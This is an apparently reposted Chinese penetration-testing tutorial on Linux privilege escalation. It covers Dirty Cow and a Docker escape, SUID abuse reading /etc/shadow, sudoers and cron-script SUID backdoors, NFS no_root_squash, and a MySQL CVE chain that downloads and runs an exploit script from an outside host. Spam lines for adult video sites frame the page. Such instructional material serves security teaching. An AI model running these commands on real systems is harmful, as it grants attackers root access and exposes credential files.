成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

Linux提權(quán)的幾種常用方式

系統(tǒng) Linux
在滲透測試過程中,提升權(quán)限是非常關(guān)鍵的一步,攻擊者往往可以通過利用內(nèi)核漏洞/權(quán)限配置不當/root權(quán)限運行的服務(wù)等方式尋找突破點,來達到提升權(quán)限的目的。

[[373960]]

本文轉(zhuǎn)載自微信公眾號「Bypass」,作者Bypass 。轉(zhuǎn)載本文請聯(lián)系Bypass公眾號。

在滲透測試過程中,提升權(quán)限是非常關(guān)鍵的一步,攻擊者往往可以通過利用內(nèi)核漏洞/權(quán)限配置不當/root權(quán)限運行的服務(wù)等方式尋找突破點,來達到提升權(quán)限的目的。

1、內(nèi)核漏洞提權(quán)

提起內(nèi)核漏洞提權(quán)就不得不提到臟牛漏洞(Dirty Cow),是存在時間最長且影響范圍最廣的漏洞之一。低權(quán)限用戶可以利用該漏洞實現(xiàn)本地提權(quán),同時可以通過該漏洞實現(xiàn)Docker容器逃逸,獲得root權(quán)限的shell。

1.1 本地內(nèi)核提權(quán)

(1)檢測內(nèi)核版本

  1. # 查看系統(tǒng)發(fā)行版本 
  2. lsb_release -a 
  3. # 查看內(nèi)核版本 
  4. uname -a 

 

(2) 下載,編譯生成exp文件

  1. bypass@ubuntu:~$ make 

 

(3)執(zhí)行成功,返回一個root權(quán)限的shell。

 

1.2 利用DirtyCow漏洞實現(xiàn)Docker逃逸

(1)進入容器,編譯POC并執(zhí)行:

 

(2)在攻擊者機器上,成功接收到宿主機反彈的shell。

 

1.3 Linux提權(quán)輔助工具

github項目地址:

  1. https://github.com/mzet-/linux-exploit-suggester.git 

(1)根據(jù)操作系統(tǒng)版本號自動查找相應(yīng)提權(quán)腳本

  1. wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh 

 

(2)根據(jù)提示下載poc,編譯執(zhí)行。

 

2、利用SUID提權(quán)

SUID是一種特殊權(quán)限,可以讓調(diào)用者在執(zhí)行過程中暫時獲得該文件擁有者的權(quán)限。如果可以找到并運行root用戶所擁有的SUID的文件,那么就可以在運行該文件的時候獲得root用戶權(quán)限。

(1)在Linux中查找可以用來提權(quán)的SUID文件

  1. find / -perm -u=s -type f 2>/dev/null 

 

(2)通過find以root權(quán)限執(zhí)行命令

 

可用作Linux提權(quán)的命令及其姿勢:

  1. #Find 
  2. find pentestlab -exec whoami \; 
  3. #Vim 
  4. vim.tiny /etc/shadow 
  5. #awk 
  6. awk 'BEGIN{system("whoami")}' 
  7. #curl 
  8. curl file:///etc/shadow 
  9. #Bash 
  10. bash -p   
  11. #Less 
  12. less /etc/passwd 
  13. #Nmap 
  14. nmap --interactive 

3、SUDO提權(quán)

普通用戶在使用sudo執(zhí)行命令的過程中,會以root方式執(zhí)行命令。在很多場景里,管理員為了運維管理方便,sudoer配置文件錯誤導致提權(quán)。

(1)設(shè)置sudo免密碼

  1. $vi /etc/sudoers 
  2. 在最后一行添加:bypass ALL=(ALL:ALL) NOPASSWD:ALL 

(2)查看sudo的權(quán)限

 

4、計劃任務(wù)

如果可以找到可以有權(quán)限修改的計劃任務(wù)腳本,就可以修改腳本實現(xiàn)提權(quán)。本質(zhì)上,就是文件權(quán)限配置不當。

(1)查看計劃任務(wù),找到有修改權(quán)限的計劃任務(wù)腳本。

  1. ls -l /etc/cron* 
  2. more /etc/crontab 

 

(2)在mysqlback.sh 添加 SUID shell后門,當定時任務(wù)以root再次執(zhí)行的時候,可以獲取root權(quán)限。

  1. cp /bin/bash /tmp/shell 
  2. chmod u+s /tmp/shell 

 

5、NFS提權(quán)

當服務(wù)器中存在NFS共享,開啟no_root_squash選項時,如果客戶端使用的是root用戶,那么對于共享目錄來說,該客戶端就有root權(quán)限,可以使用它來提升權(quán)限。

(1)查看NFS服務(wù)器上的共享目錄

  1. sudo showmount -e 10.1.1.233 

 

(2)創(chuàng)建本地掛載目錄,掛載共享目錄。使用攻擊者本地root權(quán)限創(chuàng)建Suid shell。

  1. sudo mkdir -p /tmp/data 
  2. sudo mount -t nfs 10.1.1.233:/home/bypass /tmp/data 
  3. cp /bin/bash /tmp/data/shell 
  4. chmod u+s /tmp/data/shell 

 

(3)回到要提權(quán)的服務(wù)器上,使用普通用戶使用-p參數(shù)來獲取root權(quán)限。

 

6、MySQL提權(quán)

MySQL提權(quán)方式有UDF提權(quán),MOF提權(quán),寫入啟動項提權(quán)等方式,但比較有意思的是CVE-2016-6663、CVE-2016-6664組合利用的提取場景,可以將一個www-data權(quán)限提升到root權(quán)限。

(1)利用CVE-2016-6663將www-data權(quán)限提升為mysql權(quán)限:

  1. cd /var/www/html/ 
  2. gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient 
  3. ./mysql-privesc-race test 123456 localhost testdb 

(2)利用CVE-2016-6664將Mysql權(quán)限提升為root權(quán)限:

  1. wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh 
  2. chmod 777 mysql-chowned.sh 
  3. ./mysql-chowned.sh /var/log/mysql/error.log 

 

責任編輯:武曉燕 來源: Bypass
相關(guān)推薦

2021-01-13 08:14:36

Windows提權(quán)漏洞攻擊

2018-07-05 10:44:09

Windows提權(quán)漏洞

2024-07-31 08:46:10

2017-03-25 20:30:15

2009-07-25 17:24:45

2024-01-15 00:25:59

2022-03-10 09:41:15

漏洞Linux內(nèi)核

2011-03-07 11:36:23

FileZillaSe

2010-12-10 15:23:49

Linux漏洞

2024-07-31 08:50:20

2023-09-07 13:21:00

Linux軟件

2013-10-18 10:10:45

Linux漏洞代碼提權(quán)

2009-07-25 16:52:29

2009-09-28 10:52:33

Hibernate主鍵主鍵生成

2020-08-25 08:53:02

Linux端口轉(zhuǎn)發(fā)

2021-08-06 18:37:50

SQL表連接方式

2018-07-06 13:02:23

2013-11-29 15:34:00

2021-05-01 20:52:30

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2023-06-11 17:24:26

點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 欧美日韩在线综合 | 成人精品一区二区三区 | 久久不卡日韩美女 | 一区二区三区免费在线观看 | 成人羞羞国产免费视频 | 久久国产精品网站 | 精品一区二区三区四区五区 | 精品欧美一区二区精品久久久 | 日本电影韩国电影免费观看 | 亚洲国产成人精品女人 | 欧美在线成人影院 | 久久亚洲一区二区三区四区 | 性一交一乱一伦视频免费观看 | 久久99精品久久久久久 | 成人在线不卡 | 日韩精品在线看 | 天天插天天狠天天透 | 亚洲精品一区二区三区四区高清 | 成人在线视频免费看 | 水蜜桃久久夜色精品一区 | 亚洲不卡在线观看 | 国产乱码精品一区二三赶尸艳谈 | 精品国产欧美一区二区三区成人 | 日韩色图视频 | 日韩欧美专区 | 久久久久九九九九 | 日本一区二区三区四区 | 毛片免费看 | 精品综合久久久 | 爱爱视频网 | 激情综合五月 | 日韩成人在线看 | 久久久综合精品 | 中文字幕在线剧情 | 成人蜜桃av | 成人影院午夜 | 嫩草影院网址 | 一二区成人影院电影网 | 一区中文字幕 | 欧美男人天堂 | 久久99精品久久久久久秒播九色 |